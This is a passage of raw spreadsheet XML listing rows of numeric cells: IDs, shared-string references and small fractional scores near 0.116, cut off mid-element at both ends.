      <c r="A30630" s="1">
        <v>8646.0</v>
      </c>
      <c r="B30630" s="2">
        <v>5.4344159E7</v>
      </c>
      <c r="C30630" s="2" t="s">
        <v>29452</v>
      </c>
      <c r="D30630" s="2">
        <v>1.0</v>
      </c>
      <c r="E30630" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30630" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30631" ht="15.75" customHeight="1">
      <c r="A30631" s="1">
        <v>9329.0</v>
      </c>
      <c r="B30631" s="2">
        <v>5.5603818E7</v>
      </c>
      <c r="C30631" s="2" t="s">
        <v>29453</v>
      </c>
      <c r="D30631" s="2">
        <v>1.0</v>
      </c>
      <c r="E30631" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30631" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30632" ht="15.75" customHeight="1">
      <c r="A30632" s="1">
        <v>9370.0</v>
      </c>
      <c r="B30632" s="2">
        <v>5.5691939E7</v>
      </c>
      <c r="C30632" s="2" t="s">
        <v>29454</v>
      </c>
      <c r="D30632" s="2">
        <v>1.0</v>
      </c>
      <c r="E30632" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30632" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30633" ht="15.75" customHeight="1">
      <c r="A30633" s="1">
        <v>9400.0</v>
      </c>
      <c r="B30633" s="2">
        <v>5.5765061E7</v>
      </c>
      <c r="C30633" s="2" t="s">
        <v>29455</v>
      </c>
      <c r="D30633" s="2">
        <v>1.0</v>
      </c>
      <c r="E30633" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30633" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30634" ht="15.75" customHeight="1">
      <c r="A30634" s="1">
        <v>9481.0</v>
      </c>
      <c r="B30634" s="2">
        <v>5.5888792E7</v>
      </c>
      <c r="C30634" s="2" t="s">
        <v>29456</v>
      </c>
      <c r="D30634" s="2">
        <v>1.0</v>
      </c>
      <c r="E30634" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30634" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30635" ht="15.75" customHeight="1">
      <c r="A30635" s="1">
        <v>10027.0</v>
      </c>
      <c r="B30635" s="2">
        <v>5.7055E7</v>
      </c>
      <c r="C30635" s="2" t="s">
        <v>29457</v>
      </c>
      <c r="D30635" s="2">
        <v>1.0</v>
      </c>
      <c r="E30635" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30635" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30636" ht="15.75" customHeight="1">
      <c r="A30636" s="1">
        <v>10157.0</v>
      </c>
      <c r="B30636" s="2">
        <v>5.7327653E7</v>
      </c>
      <c r="C30636" s="2" t="s">
        <v>29458</v>
      </c>
      <c r="D30636" s="2">
        <v>1.0</v>
      </c>
      <c r="E30636" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30636" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30637" ht="15.75" customHeight="1">
      <c r="A30637" s="1">
        <v>10288.0</v>
      </c>
      <c r="B30637" s="2">
        <v>5.7636265E7</v>
      </c>
      <c r="C30637" s="2" t="s">
        <v>29459</v>
      </c>
      <c r="D30637" s="2">
        <v>1.0</v>
      </c>
      <c r="E30637" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30637" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30638" ht="15.75" customHeight="1">
      <c r="A30638" s="1">
        <v>11406.0</v>
      </c>
      <c r="B30638" s="2">
        <v>2.163886E7</v>
      </c>
      <c r="C30638" s="2" t="s">
        <v>29460</v>
      </c>
      <c r="D30638" s="2">
        <v>1.0</v>
      </c>
      <c r="E30638" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30638" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30639" ht="15.75" customHeight="1">
      <c r="A30639" s="1">
        <v>11794.0</v>
      </c>
      <c r="B30639" s="2">
        <v>2.4371727E7</v>
      </c>
      <c r="C30639" s="2" t="s">
        <v>29461</v>
      </c>
      <c r="D30639" s="2">
        <v>1.0</v>
      </c>
      <c r="E30639" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30639" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30640" ht="15.75" customHeight="1">
      <c r="A30640" s="1">
        <v>11996.0</v>
      </c>
      <c r="B30640" s="2">
        <v>2.591944E7</v>
      </c>
      <c r="C30640" s="2" t="s">
        <v>29462</v>
      </c>
      <c r="D30640" s="2">
        <v>1.0</v>
      </c>
      <c r="E30640" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30640" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30641" ht="15.75" customHeight="1">
      <c r="A30641" s="1">
        <v>12361.0</v>
      </c>
      <c r="B30641" s="2">
        <v>2.8747712E7</v>
      </c>
      <c r="C30641" s="2" t="s">
        <v>29463</v>
      </c>
      <c r="D30641" s="2">
        <v>1.0</v>
      </c>
      <c r="E30641" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30641" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30642" ht="15.75" customHeight="1">
      <c r="A30642" s="1">
        <v>12605.0</v>
      </c>
      <c r="B30642" s="2">
        <v>3.0137461E7</v>
      </c>
      <c r="C30642" s="2" t="s">
        <v>29464</v>
      </c>
      <c r="D30642" s="2">
        <v>1.0</v>
      </c>
      <c r="E30642" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30642" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30643" ht="15.75" customHeight="1">
      <c r="A30643" s="1">
        <v>12786.0</v>
      </c>
      <c r="B30643" s="2">
        <v>3.1365208E7</v>
      </c>
      <c r="C30643" s="2" t="s">
        <v>29465</v>
      </c>
      <c r="D30643" s="2">
        <v>1.0</v>
      </c>
      <c r="E30643" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30643" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30644" ht="15.75" customHeight="1">
      <c r="A30644" s="1">
        <v>13172.0</v>
      </c>
      <c r="B30644" s="2">
        <v>3.4000221E7</v>
      </c>
      <c r="C30644" s="2" t="s">
        <v>29466</v>
      </c>
      <c r="D30644" s="2">
        <v>1.0</v>
      </c>
      <c r="E30644" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30644" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30645" ht="15.75" customHeight="1">
      <c r="A30645" s="1">
        <v>13293.0</v>
      </c>
      <c r="B30645" s="2">
        <v>3.4470626E7</v>
      </c>
      <c r="C30645" s="2" t="s">
        <v>29467</v>
      </c>
      <c r="D30645" s="2">
        <v>1.0</v>
      </c>
      <c r="E30645" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30645" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30646" ht="15.75" customHeight="1">
      <c r="A30646" s="1">
        <v>13303.0</v>
      </c>
      <c r="B30646" s="2">
        <v>3.4509988E7</v>
      </c>
      <c r="C30646" s="2" t="s">
        <v>29468</v>
      </c>
      <c r="D30646" s="2">
        <v>1.0</v>
      </c>
      <c r="E30646" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30646" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30647" ht="15.75" customHeight="1">
      <c r="A30647" s="1">
        <v>13451.0</v>
      </c>
      <c r="B30647" s="2">
        <v>3.5186909E7</v>
      </c>
      <c r="C30647" s="2" t="s">
        <v>29469</v>
      </c>
      <c r="D30647" s="2">
        <v>1.0</v>
      </c>
      <c r="E30647" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30647" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30648" ht="15.75" customHeight="1">
      <c r="A30648" s="1">
        <v>15387.0</v>
      </c>
      <c r="B30648" s="2">
        <v>4.2780974E7</v>
      </c>
      <c r="C30648" s="2" t="s">
        <v>29470</v>
      </c>
      <c r="D30648" s="2">
        <v>1.0</v>
      </c>
      <c r="E30648" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30648" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30649" ht="15.75" customHeight="1">
      <c r="A30649" s="1">
        <v>15931.0</v>
      </c>
      <c r="B30649" s="2">
        <v>4.4699775E7</v>
      </c>
      <c r="C30649" s="2" t="s">
        <v>29471</v>
      </c>
      <c r="D30649" s="2">
        <v>1.0</v>
      </c>
      <c r="E30649" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30649" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30650" ht="15.75" customHeight="1">
      <c r="A30650" s="1">
        <v>16016.0</v>
      </c>
      <c r="B30650" s="2">
        <v>4.5017423E7</v>
      </c>
      <c r="C30650" s="2" t="s">
        <v>29472</v>
      </c>
      <c r="D30650" s="2">
        <v>1.0</v>
      </c>
      <c r="E30650" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30650" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30651" ht="15.75" customHeight="1">
      <c r="A30651" s="1">
        <v>16453.0</v>
      </c>
      <c r="B30651" s="2">
        <v>4.6430982E7</v>
      </c>
      <c r="C30651" s="2" t="s">
        <v>29473</v>
      </c>
      <c r="D30651" s="2">
        <v>1.0</v>
      </c>
      <c r="E30651" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30651" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30652" ht="15.75" customHeight="1">
      <c r="A30652" s="1">
        <v>16757.0</v>
      </c>
      <c r="B30652" s="2">
        <v>4.7594751E7</v>
      </c>
      <c r="C30652" s="2" t="s">
        <v>29474</v>
      </c>
      <c r="D30652" s="2">
        <v>1.0</v>
      </c>
      <c r="E30652" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30652" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30653" ht="15.75" customHeight="1">
      <c r="A30653" s="1">
        <v>17877.0</v>
      </c>
      <c r="B30653" s="2">
        <v>5.1027859E7</v>
      </c>
      <c r="C30653" s="2" t="s">
        <v>29475</v>
      </c>
      <c r="D30653" s="2">
        <v>1.0</v>
      </c>
      <c r="E30653" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30653" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30654" ht="15.75" customHeight="1">
      <c r="A30654" s="1">
        <v>18267.0</v>
      </c>
      <c r="B30654" s="2">
        <v>5.2197053E7</v>
      </c>
      <c r="C30654" s="2" t="s">
        <v>29449</v>
      </c>
      <c r="D30654" s="2">
        <v>1.0</v>
      </c>
      <c r="E30654" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30654" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30655" ht="15.75" customHeight="1">
      <c r="A30655" s="1">
        <v>18404.0</v>
      </c>
      <c r="B30655" s="2">
        <v>5.2637371E7</v>
      </c>
      <c r="C30655" s="2" t="s">
        <v>29476</v>
      </c>
      <c r="D30655" s="2">
        <v>1.0</v>
      </c>
      <c r="E30655" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30655" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30656" ht="15.75" customHeight="1">
      <c r="A30656" s="1">
        <v>18489.0</v>
      </c>
      <c r="B30656" s="2">
        <v>5.2903117E7</v>
      </c>
      <c r="C30656" s="2" t="s">
        <v>29477</v>
      </c>
      <c r="D30656" s="2">
        <v>1.0</v>
      </c>
      <c r="E30656" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30656" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30657" ht="15.75" customHeight="1">
      <c r="A30657" s="1">
        <v>18518.0</v>
      </c>
      <c r="B30657" s="2">
        <v>5.3012168E7</v>
      </c>
      <c r="C30657" s="2" t="s">
        <v>29478</v>
      </c>
      <c r="D30657" s="2">
        <v>1.0</v>
      </c>
      <c r="E30657" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30657" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30658" ht="15.75" customHeight="1">
      <c r="A30658" s="1">
        <v>18631.0</v>
      </c>
      <c r="B30658" s="2">
        <v>5.3380198E7</v>
      </c>
      <c r="C30658" s="2" t="s">
        <v>29479</v>
      </c>
      <c r="D30658" s="2">
        <v>1.0</v>
      </c>
      <c r="E30658" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30658" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30659" ht="15.75" customHeight="1">
      <c r="A30659" s="1">
        <v>19111.0</v>
      </c>
      <c r="B30659" s="2">
        <v>5.4739614E7</v>
      </c>
      <c r="C30659" s="2" t="s">
        <v>29480</v>
      </c>
      <c r="D30659" s="2">
        <v>1.0</v>
      </c>
      <c r="E30659" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30659" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30660" ht="15.75" customHeight="1">
      <c r="A30660" s="1">
        <v>19141.0</v>
      </c>
      <c r="B30660" s="2">
        <v>5.4825875E7</v>
      </c>
      <c r="C30660" s="2" t="s">
        <v>29481</v>
      </c>
      <c r="D30660" s="2">
        <v>1.0</v>
      </c>
      <c r="E30660" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30660" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30661" ht="15.75" customHeight="1">
      <c r="A30661" s="1">
        <v>19172.0</v>
      </c>
      <c r="B30661" s="2">
        <v>5.4970251E7</v>
      </c>
      <c r="C30661" s="2" t="s">
        <v>29482</v>
      </c>
      <c r="D30661" s="2">
        <v>1.0</v>
      </c>
      <c r="E30661" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30661" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30662" ht="15.75" customHeight="1">
      <c r="A30662" s="1">
        <v>19684.0</v>
      </c>
      <c r="B30662" s="2">
        <v>5.6461781E7</v>
      </c>
      <c r="C30662" s="2" t="s">
        <v>29483</v>
      </c>
      <c r="D30662" s="2">
        <v>1.0</v>
      </c>
      <c r="E30662" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30662" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30663" ht="15.75" customHeight="1">
      <c r="A30663" s="1">
        <v>19783.0</v>
      </c>
      <c r="B30663" s="2">
        <v>5.6795871E7</v>
      </c>
      <c r="C30663" s="2" t="s">
        <v>29484</v>
      </c>
      <c r="D30663" s="2">
        <v>1.0</v>
      </c>
      <c r="E30663" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30663" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30664" ht="15.75" customHeight="1">
      <c r="A30664" s="1">
        <v>19801.0</v>
      </c>
      <c r="B30664" s="2">
        <v>5.6876822E7</v>
      </c>
      <c r="C30664" s="2" t="s">
        <v>29485</v>
      </c>
      <c r="D30664" s="2">
        <v>1.0</v>
      </c>
      <c r="E30664" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30664" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30665" ht="15.75" customHeight="1">
      <c r="A30665" s="1">
        <v>19981.0</v>
      </c>
      <c r="B30665" s="2">
        <v>5.7612546E7</v>
      </c>
      <c r="C30665" s="2" t="s">
        <v>29486</v>
      </c>
      <c r="D30665" s="2">
        <v>1.0</v>
      </c>
      <c r="E30665" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30665" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30666" ht="15.75" customHeight="1">
      <c r="A30666" s="1">
        <v>20039.0</v>
      </c>
      <c r="B30666" s="2">
        <v>741166.0</v>
      </c>
      <c r="C30666" s="2" t="s">
        <v>29487</v>
      </c>
      <c r="D30666" s="2">
        <v>1.0</v>
      </c>
      <c r="E30666" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30666" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30667" ht="15.75" customHeight="1">
      <c r="A30667" s="1">
        <v>20925.0</v>
      </c>
      <c r="B30667" s="2">
        <v>1.6393808E7</v>
      </c>
      <c r="C30667" s="2" t="s">
        <v>29488</v>
      </c>
      <c r="D30667" s="2">
        <v>1.0</v>
      </c>
      <c r="E30667" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30667" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30668" ht="15.75" customHeight="1">
      <c r="A30668" s="1">
        <v>21632.0</v>
      </c>
      <c r="B30668" s="2">
        <v>2.465639E7</v>
      </c>
      <c r="C30668" s="2" t="s">
        <v>29489</v>
      </c>
      <c r="D30668" s="2">
        <v>1.0</v>
      </c>
      <c r="E30668" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30668" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30669" ht="15.75" customHeight="1">
      <c r="A30669" s="1">
        <v>21653.0</v>
      </c>
      <c r="B30669" s="2">
        <v>2.4921599E7</v>
      </c>
      <c r="C30669" s="2" t="s">
        <v>29490</v>
      </c>
      <c r="D30669" s="2">
        <v>1.0</v>
      </c>
      <c r="E30669" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30669" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30670" ht="15.75" customHeight="1">
      <c r="A30670" s="1">
        <v>21991.0</v>
      </c>
      <c r="B30670" s="2">
        <v>2.9459889E7</v>
      </c>
      <c r="C30670" s="2" t="s">
        <v>29491</v>
      </c>
      <c r="D30670" s="2">
        <v>1.0</v>
      </c>
      <c r="E30670" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30670" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30671" ht="15.75" customHeight="1">
      <c r="A30671" s="1">
        <v>22256.0</v>
      </c>
      <c r="B30671" s="2">
        <v>3.2823361E7</v>
      </c>
      <c r="C30671" s="2" t="s">
        <v>29363</v>
      </c>
      <c r="D30671" s="2">
        <v>1.0</v>
      </c>
      <c r="E30671" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30671" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30672" ht="15.75" customHeight="1">
      <c r="A30672" s="1">
        <v>26291.0</v>
      </c>
      <c r="B30672" s="2">
        <v>1.6484534E7</v>
      </c>
      <c r="C30672" s="2" t="s">
        <v>29492</v>
      </c>
      <c r="D30672" s="2">
        <v>1.0</v>
      </c>
      <c r="E30672" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30672" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30673" ht="15.75" customHeight="1">
      <c r="A30673" s="1">
        <v>26734.0</v>
      </c>
      <c r="B30673" s="2">
        <v>1.8274903E7</v>
      </c>
      <c r="C30673" s="2" t="s">
        <v>29493</v>
      </c>
      <c r="D30673" s="2">
        <v>1.0</v>
      </c>
      <c r="E30673" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30673" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30674" ht="15.75" customHeight="1">
      <c r="A30674" s="1">
        <v>28679.0</v>
      </c>
      <c r="B30674" s="2">
        <v>2.7564733E7</v>
      </c>
      <c r="C30674" s="2" t="s">
        <v>29494</v>
      </c>
      <c r="D30674" s="2">
        <v>1.0</v>
      </c>
      <c r="E30674" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30674" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30675" ht="15.75" customHeight="1">
      <c r="A30675" s="1">
        <v>28914.0</v>
      </c>
      <c r="B30675" s="2">
        <v>2.9459888E7</v>
      </c>
      <c r="C30675" s="2" t="s">
        <v>29491</v>
      </c>
      <c r="D30675" s="2">
        <v>1.0</v>
      </c>
      <c r="E30675" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30675" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30676" ht="15.75" customHeight="1">
      <c r="A30676" s="1">
        <v>30019.0</v>
      </c>
      <c r="B30676" s="2">
        <v>3.6165804E7</v>
      </c>
      <c r="C30676" s="2" t="s">
        <v>29495</v>
      </c>
      <c r="D30676" s="2">
        <v>1.0</v>
      </c>
      <c r="E30676" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30676" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30677" ht="15.75" customHeight="1">
      <c r="A30677" s="1">
        <v>30123.0</v>
      </c>
      <c r="B30677" s="2">
        <v>3.6889936E7</v>
      </c>
      <c r="C30677" s="2" t="s">
        <v>29496</v>
      </c>
      <c r="D30677" s="2">
        <v>1.0</v>
      </c>
      <c r="E30677" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30677" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30678" ht="15.75" customHeight="1">
      <c r="A30678" s="1">
        <v>30216.0</v>
      </c>
      <c r="B30678" s="2">
        <v>3.7395961E7</v>
      </c>
      <c r="C30678" s="2" t="s">
        <v>29497</v>
      </c>
      <c r="D30678" s="2">
        <v>1.0</v>
      </c>
      <c r="E30678" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30678" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30679" ht="15.75" customHeight="1">
      <c r="A30679" s="1">
        <v>31471.0</v>
      </c>
      <c r="B30679" s="2">
        <v>5046390.0</v>
      </c>
      <c r="C30679" s="2" t="s">
        <v>29498</v>
      </c>
      <c r="D30679" s="2">
        <v>1.0</v>
      </c>
      <c r="E30679" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30679" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30680" ht="15.75" customHeight="1">
      <c r="A30680" s="1">
        <v>32160.0</v>
      </c>
      <c r="B30680" s="2">
        <v>5.4368856E7</v>
      </c>
      <c r="C30680" s="2" t="s">
        <v>29499</v>
      </c>
      <c r="D30680" s="2">
        <v>1.0</v>
      </c>
      <c r="E30680" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30680" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30681" ht="15.75" customHeight="1">
      <c r="A30681" s="1">
        <v>32514.0</v>
      </c>
      <c r="B30681" s="2">
        <v>5716250.0</v>
      </c>
      <c r="C30681" s="2" t="s">
        <v>29500</v>
      </c>
      <c r="D30681" s="2">
        <v>1.0</v>
      </c>
      <c r="E30681" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30681" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30682" ht="15.75" customHeight="1">
      <c r="A30682" s="1">
        <v>32522.0</v>
      </c>
      <c r="B30682" s="2">
        <v>5728786.0</v>
      </c>
      <c r="C30682" s="2" t="s">
        <v>29501</v>
      </c>
      <c r="D30682" s="2">
        <v>1.0</v>
      </c>
      <c r="E30682" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30682" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30683" ht="15.75" customHeight="1">
      <c r="A30683" s="1">
        <v>32721.0</v>
      </c>
      <c r="B30683" s="2">
        <v>5981009.0</v>
      </c>
      <c r="C30683" s="2" t="s">
        <v>29502</v>
      </c>
      <c r="D30683" s="2">
        <v>1.0</v>
      </c>
      <c r="E30683" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30683" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30684" ht="15.75" customHeight="1">
      <c r="A30684" s="1">
        <v>33432.0</v>
      </c>
      <c r="B30684" s="2">
        <v>7804876.0</v>
      </c>
      <c r="C30684" s="2" t="s">
        <v>29503</v>
      </c>
      <c r="D30684" s="2">
        <v>1.0</v>
      </c>
      <c r="E30684" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30684" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="30685" ht="15.75" customHeight="1">
      <c r="A30685" s="1">
        <v>2115.0</v>
      </c>
      <c r="B30685" s="2">
        <v>3.1373479E7</v>
      </c>
      <c r="C30685" s="2" t="s">
        <v>29504</v>
      </c>
      <c r="D30685" s="2">
        <v>1.0</v>
      </c>
      <c r="E30685" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30685" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="30686" ht="15.75" customHeight="1">
      <c r="A30686" s="1">
        <v>10978.0</v>
      </c>
      <c r="B30686" s="2">
        <v>1.7336646E7</v>
      </c>
      <c r="C30686" s="2" t="s">
        <v>29505</v>
      </c>
      <c r="D30686" s="2">
        <v>1.0</v>
      </c>
      <c r="E30686" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30686" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="30687" ht="15.75" customHeight="1">
      <c r="A30687" s="1">
        <v>22403.0</v>
      </c>
      <c r="B30687" s="2">
        <v>3.5700861E7</v>
      </c>
      <c r="C30687" s="2" t="s">
        <v>29506</v>
      </c>
      <c r="D30687" s="2">
        <v>1.0</v>
      </c>
      <c r="E30687" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30687" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="30688" ht="15.75" customHeight="1">
      <c r="A30688" s="1">
        <v>23210.0</v>
      </c>
      <c r="B30688" s="2">
        <v>5.2688077E7</v>
      </c>
      <c r="C30688" s="2" t="s">
        <v>29507</v>
      </c>
      <c r="D30688" s="2">
        <v>1.0</v>
      </c>
      <c r="E30688" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30688" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="30689" ht="15.75" customHeight="1">
      <c r="A30689" s="1">
        <v>31621.0</v>
      </c>
      <c r="B30689" s="2">
        <v>5144065.0</v>
      </c>
      <c r="C30689" s="2" t="s">
        <v>29370</v>
      </c>
      <c r="D30689" s="2">
        <v>1.0</v>
      </c>
      <c r="E30689" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30689" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="30690" ht="15.75" customHeight="1">
      <c r="A30690" s="1">
        <v>33122.0</v>
      </c>
      <c r="B30690" s="2">
        <v>7000890.0</v>
      </c>
      <c r="C30690" s="2" t="s">
        <v>29508</v>
      </c>
      <c r="D30690" s="2">
        <v>1.0</v>
      </c>
      <c r="E30690" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30690" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="30691" ht="15.75" customHeight="1">
      <c r="A30691" s="1">
        <v>34262.0</v>
      </c>
      <c r="B30691" s="2">
        <v>8044210.0</v>
      </c>
      <c r="C30691" s="2" t="s">
        <v>29509</v>
      </c>
      <c r="D30691" s="2">
        <v>1.0</v>
      </c>
      <c r="E30691" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30691" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="30692" ht="15.75" customHeight="1">
      <c r="A30692" s="1">
        <v>2085.0</v>
      </c>
      <c r="B30692" s="2">
        <v>3.1195774E7</v>
      </c>
      <c r="C30692" s="2" t="s">
        <v>29510</v>
      </c>
      <c r="D30692" s="2">
        <v>1.0</v>
      </c>
      <c r="E30692" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30692" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="30693" ht="15.75" customHeight="1">
      <c r="A30693" s="1">
        <v>6670.0</v>
      </c>
      <c r="B30693" s="2">
        <v>4.9129382E7</v>
      </c>
      <c r="C30693" s="2" t="s">
        <v>29511</v>
      </c>
      <c r="D30693" s="2">
        <v>1.0</v>
      </c>
      <c r="E30693" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30693" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="30694" ht="15.75" customHeight="1">
      <c r="A30694" s="1">
        <v>8364.0</v>
      </c>
      <c r="B30694" s="2">
        <v>5.37911E7</v>
      </c>
      <c r="C30694" s="2" t="s">
        <v>29512</v>
      </c>
      <c r="D30694" s="2">
        <v>1.0</v>
      </c>
      <c r="E30694" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30694" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="30695" ht="15.75" customHeight="1">
      <c r="A30695" s="1">
        <v>8453.0</v>
      </c>
      <c r="B30695" s="2">
        <v>5.3975429E7</v>
      </c>
      <c r="C30695" s="2" t="s">
        <v>29513</v>
      </c>
      <c r="D30695" s="2">
        <v>1.0</v>
      </c>
      <c r="E30695" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30695" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="30696" ht="15.75" customHeight="1">
      <c r="A30696" s="1">
        <v>9208.0</v>
      </c>
      <c r="B30696" s="2">
        <v>5.5413556E7</v>
      </c>
      <c r="C30696" s="2" t="s">
        <v>29514</v>
      </c>
      <c r="D30696" s="2">
        <v>1.0</v>
      </c>
      <c r="E30696" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30696" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="30697" ht="15.75" customHeight="1">
      <c r="A30697" s="1">
